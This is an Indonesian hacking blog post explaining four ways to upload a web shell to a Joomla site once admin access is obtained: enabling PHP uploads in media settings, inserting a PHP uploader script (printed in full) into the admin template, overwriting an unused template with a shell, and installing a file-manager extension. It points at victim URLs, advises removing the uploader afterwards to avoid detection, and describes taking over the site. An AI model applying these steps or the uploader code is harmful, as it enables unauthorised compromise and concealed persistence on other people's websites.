• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "cara upload shell di CMS joomla"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeHackingVulnwebsitecara upload shell di CMS joomla
    cara upload shell di CMS joomla

    cara upload shell di CMS joomla

    Simpan Postingan

    kali ini ane mo share sdikit bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa..
    okedeh, langsung ke tutorialnya aja.
    pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.

    CARA 1
    masuk ke menu site > global configuration. trus klik bagian system



    perhatikan bagian media setting, 
    trus di sub bagian 
    [+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
    [+]Restrict Uploads --> pilih NO
    [+]Check MIME Types --> pilih NO
    [+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
    [+]Legal MIME Types --> tambahin image/php





    klo udah save. stelah itu..
    pergi ke media manager (site > media manager) upload shellnya disitu.




    lalu upload deh shellnya




    udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php






    CARA 2

    secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :p
    Klik menu Extension > template manager




    trus pergi di bagian administrator.



    kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.









    kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.

    buat yg belom punya uploader, bisa di copy script di bawah

    <?php echo '<b>TrojanzBoy uploader</b>'; echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; } else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; } } ?>


    mari kita sisipin uploadernya, taro dibawah </body> aja.






    klo udah. save aja.
    sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.






    setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php


    *kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.

    :)



    CARA 3

    masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
    kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
    skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
    klik aja nama template yg ga aktif. misal: beez
    trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita





    klo udah silakan disave. nah.. skrng kita coba menuju shell kita.

    letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php






    CARA 4
    jika joomla compatibble dengan ninja xploler coba intall saja dengan cara masuk ke extension > instal/unintsal 






    lalu browse dan pilih ninja xploler jika belum punya ninja xploler silahkan download -->

    di Kemp T.I Sniper

    setelah selesai intall lalu pilih components > ninja xplorer






    setelah itu tentukan letak upload shellnya disini saya letakkan pada folder logs lalu klik upload





    setelah itu eksekusi shellnya pada http://target.com/logs/namashell.php




    sekarang kalian sudah take over webnya
    tinggal ubah sesuai keinginan kalian

    kalau tidak bisa karna joomla telah di update dari cms yang lama ke yang baru bisa gunakan cara ini

    pertama masuk content > media manager > option






    setelah itu tambahkan extension php pada legal extension , legal image extension




    setelah itu save and exit

    lalu cobalah upload shell backdoor anda




    dan berhasil kita upload shell backdoor kita pada web






    hmmhh.. baru segitu cara ane,
    mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.T.I Sniper

    Hacking Vuln website
    September 15, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan